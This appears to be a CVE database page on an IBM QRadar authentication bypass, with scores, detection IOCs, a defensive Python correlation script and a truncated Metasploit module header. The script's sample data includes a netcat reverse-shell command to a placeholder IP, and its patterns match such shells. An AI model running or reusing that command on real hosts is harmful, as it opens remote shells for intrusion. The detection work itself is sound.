CVE-2018-1612
Published 2018-07-17
Priority: P2 · Severity: medium (CVSS 3.0 base score 5.8)
Vector: AV:N / AC:L / PR:N / UI:N / S:C / C:L / I:N / A:N
Exploit: public exploit available
EPSS: 56.95% (98.9th percentile)
IBM QRadar Incident Forensics (IBM QRadar SIEM 7.2, and 7.3) could allow a remote attacker to bypass authentication and obtain sensitive information. IBM X-Force ID: 144164.
Affected (6 CPE ranges listed; only one carries an explicit version range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ibm | qradar_security_information_and_event_manager | 7.2.0 – 7.2.8 | — |
| ibm | qradar_security_information_and_event_manager | — (3 further entries without a version range) | — |
| ibm | qradar_siem | — (2 entries without a version range) | — |
Detection & IOCs (extracted from sources)
- Alert on GET requests to /ForensicsAnalysisServlet/ that return HTTP 403: the Metasploit module uses this response as a fingerprint to confirm the vulnerable endpoint is present.
- Monitor for new or modified files written under /store/configservices/staging/updates/ by the 'nobody' user; this is where the attacker-controlled shell script is staged for execution as root.
- Detect outbound HTTP/HTTPS connections from the QRadar host to attacker-controlled infrastructure on the non-standard port 4448, used to download the privilege-escalation payload.
- Alert on execution of /usr/bin/nc with the -e flag from a QRadar process context; this is the reverse-shell command dropped and executed as part of the exploit chain.
- The exploit chain requires three CVEs chained together (CVE-2016-9722, CVE-2018-1418, CVE-2018-1612); correlating all three in SIEM alerts gives high-confidence detection of this specific attack.
- The Forensics web application is disabled in QRadar Community Edition, but the vulnerable code is still present and reachable, so every QRadar flavour is exploitable regardless of whether Forensics is enabled.
- Confirmed vulnerable versions span IBM QRadar SIEM up to 7.2.8 Patch 12 and 7.3.1 Patch 3; detections should cover both the 7.2 and 7.3 branches.
- The final privilege-escalation stage relies on a QRadar scheduled task executing the attacker's script as root; the delay between initial compromise and root execution can be up to about 80 seconds, which matters for any timing-based correlation.
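The IOCs above are individually noisy (a lone 403 on the servlet is just a scanner), so the useful detection is the correlation of several stages on one host inside a window wider than the ~80 s scheduled-task delay. The following is an added example, not code from the original page or from the Metasploit module: it classifies normalised host events into chain stages and raises one alert per cluster. The event feed and its field names (`type`, `ts`, `src`, `path`, `status`, `user`, `cmd`) are a constructed assumption of this example, not a QRadar or auditd schema, and the 5-minute window is likewise an assumption.

```python
"""Correlate the QRadar exploit-chain IOCs into one alert per cluster of activity.

Added example, not part of the original page or of the Metasploit module.
The event dictionaries are a constructed, normalised feed (web access log,
file-integrity and process-start events merged per host); the field names
are an assumption of this example, not a QRadar or auditd schema.
"""
import re
from dataclasses import dataclass

# Observables taken from the IOC list on this page.
FORENSICS_PATH = "/ForensicsAnalysisServlet/"
STAGING_DIR = "/store/configservices/staging/updates/"
NC_REVERSE_SHELL = re.compile(r"(^|/)nc\b.*\s-e\s")

STAGE_ORDER = ["fingerprint", "staged_script", "reverse_shell", "root_exec"]
# Root execution is done by a scheduled task up to ~80 s after the script is
# staged, so the correlation window must be wider than that (assumption: 5 min).
WINDOW_SECONDS = 300


@dataclass
class Finding:
    ts: int        # epoch seconds
    stage: str
    detail: str


def classify(event):
    """Map one normalised event to an exploit-chain stage, or None if benign."""
    kind = event.get("type")
    if kind == "http":
        if event.get("path", "").startswith(FORENSICS_PATH) and event.get("status") == 403:
            return Finding(event["ts"], "fingerprint",
                           f"{event.get('src')} GET {event['path']} -> 403")
    elif kind == "file":
        if event.get("path", "").startswith(STAGING_DIR) and event.get("user") == "nobody":
            return Finding(event["ts"], "staged_script", f"nobody wrote {event['path']}")
    elif kind == "proc":
        cmd = event.get("cmd", "")
        if NC_REVERSE_SHELL.search(cmd):
            return Finding(event["ts"], "reverse_shell", f"{event.get('user')}: {cmd}")
        if event.get("user") == "root" and STAGING_DIR in cmd:
            return Finding(event["ts"], "root_exec", f"root ran {cmd}")
    return None


def correlate(events, window=WINDOW_SECONDS):
    """Group findings that fall within `window` seconds of the first finding in
    the group and alert when two or more distinct stages are present."""
    findings = sorted((f for f in map(classify, events) if f), key=lambda f: f.ts)
    groups = []
    for f in findings:
        if groups and f.ts - groups[-1][0].ts <= window:
            groups[-1].append(f)
        else:
            groups.append([f])
    alerts = []
    for group in groups:
        stages = [s for s in STAGE_ORDER if any(f.stage == s for f in group)]
        if len(stages) < 2:
            continue  # a lone 403 on the servlet is a scan, not a compromise
        severity = "high" if {"staged_script", "root_exec"} <= set(stages) else "medium"
        alerts.append({"severity": severity, "stages": stages,
                       "first": group[0].ts, "last": group[-1].ts,
                       "details": [f.detail for f in group]})
    return alerts


# Constructed sample feed (not real telemetry): a full chain, then a harmless
# root rsync job, then a lone scanner hitting the servlet much later.
SAMPLE_EVENTS = [
    {"type": "http", "ts": 100, "src": "198.51.100.7", "method": "GET",
     "path": "/ForensicsAnalysisServlet/", "status": 403},
    {"type": "http", "ts": 101, "src": "198.51.100.7", "method": "GET",
     "path": "/console/", "status": 200},
    {"type": "file", "ts": 130, "user": "nobody",
     "path": "/store/configservices/staging/updates/x.sh"},
    {"type": "proc", "ts": 135, "user": "nobody",
     "cmd": "/usr/bin/nc 198.51.100.7 4448 -e /bin/sh"},
    {"type": "proc", "ts": 200, "user": "root",
     "cmd": "/bin/bash /store/configservices/staging/updates/x.sh"},
    {"type": "proc", "ts": 5000, "user": "root",
     "cmd": "/usr/bin/rsync -e ssh /var/log/ backup:/qradar/"},
    {"type": "http", "ts": 9000, "src": "203.0.113.9", "method": "GET",
     "path": "/ForensicsAnalysisServlet/", "status": 403},
]

if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print(alert["severity"], alert["stages"], alert["first"], alert["last"])
```

Run as a script it prints a single `high` alert spanning ts 100 to 200; the rsync job (which also carries `-e`) and the late scanner produce nothing, which is the point of requiring two stages and anchoring the `nc` match on the binary name rather than the flag alone.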
CVSS provenance
- NVD, CVSS v3.0: 5.8 MEDIUM (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N)
- NVD, CVSS v2.0: 5.0 MEDIUM (AV:N/AC:L/Au:N/C:P/I:N/A:N)
No detection rules found.
Exploit-DB
IBM QRadar SIEM - Remote Code Execution (Metasploit), exploitdb, 2018-07-11
```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'securerandom'

class MetasploitModule < Msf::Exploit::Remote
  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'IBM QRadar SIEM Unauthenticated Remote Code Execution',
      'Description' => %q{
        IBM QRadar SIEM has three vulnerabilities in the Forensics web application
        that when chained together allow an attacker to achieve unauthenticated remote code execution.
        The first stage bypasses authentication by fixating session cookies.
        The second stage uses those authenticated session cookies to write a file to disk and execute
        that file as the "nobody" user.
        The third and final stage occurs when the file executed as "nobody" writes an entry into the
        database that causes QRadar to execute a shell script controlled by the attacker as root
        within the next minute.
      }
      # The remaining module metadata, options and exploit method are not reproduced on this page.
    ))
  end
end
```
Metasploit
IBM QRadar SIEM Unauthenticated Remote Code Execution
IBM QRadar SIEM has three vulnerabilities in the Forensics web application that when chained together allow an attacker to achieve unauthenticated remote code execution. The first stage bypasses authentication by fixating session cookies. The second stage uses those authenticated session cookies to write a file to disk and execute that file as the "nobody" user. The third and final stage occurs when the file executed as "nobody" writes an entry into the database that causes QRadar to execute a shell script controlled by the attacker as root within the next minute. Details about these vulnerabilities can be found in the advisories listed in References. The Forensics web application is disabled in QRadar Community Edition, but the code
No writeups or analysis indexed.
References
- http://www-01.ibm.com/support/docview.wss?uid=swg22017062
- https://exchange.xforce.ibmcloud.com/vulnerabilities/144164
- https://www.exploit-db.com/exploits/45005/